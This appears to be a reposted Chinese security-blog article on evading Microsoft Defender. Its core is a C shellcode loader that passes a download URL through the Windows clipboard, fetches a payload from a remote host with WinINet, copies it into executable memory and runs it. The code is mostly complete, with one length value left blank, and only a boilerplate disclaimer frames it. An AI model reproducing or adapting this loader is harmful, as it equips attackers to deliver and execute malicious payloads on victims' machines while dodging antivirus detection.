相关API:
BOOL OpenClipboard([in, optional] HWND hWndNewOwner //打开剪贴板以供检查,并阻止其他应用程序修改剪贴板内容。);
HANDLE GetClipboardData([in] UINT uFormat //从剪贴板中检索指定格式的数据。 剪贴板之前必须已打开。);
LPVOID GlobalLock([in] HGLOBAL hMem //锁定全局内存对象并返回指向对象内存块的第一个字节的指针。);
0x03 免杀代码实现
system("echo http://192.168.183.137:81/1.txt | clip");BOOL Cb = OpenClipboard(NULL);HANDLE hMem = GetClipboardData(CF_TEXT);char* url = (char*)GlobalLock(hMem);
hInternet = InternetOpenA("Mozilla/5.0 (Macintosh; Intel Mac OS X 12.1; rv:91.0) Gecko/20100101 Firefox/91.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);hConnect = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);pBuf = (char*)malloc(dwBufferSize);memset(pBuf, 0, dwBufferSize);InternetReadFile(hConnect, pBuf, dwBufferSize, &dwRet);InternetCloseHandle(hInternet);InternetCloseHandle(hConnect);
char* scd = GetUrlPage(pBuf);int shellcode_length = ; //shellcode大小void* exec = VirtualAlloc(0, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);memcpy(exec, scd, shellcode_length);GlobalUnlock(hMem);CloseClipboard();((void(*)())exec)();
原文始发于微信公众号(安全天书):【免杀思路】不一样的分离bypassDefender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论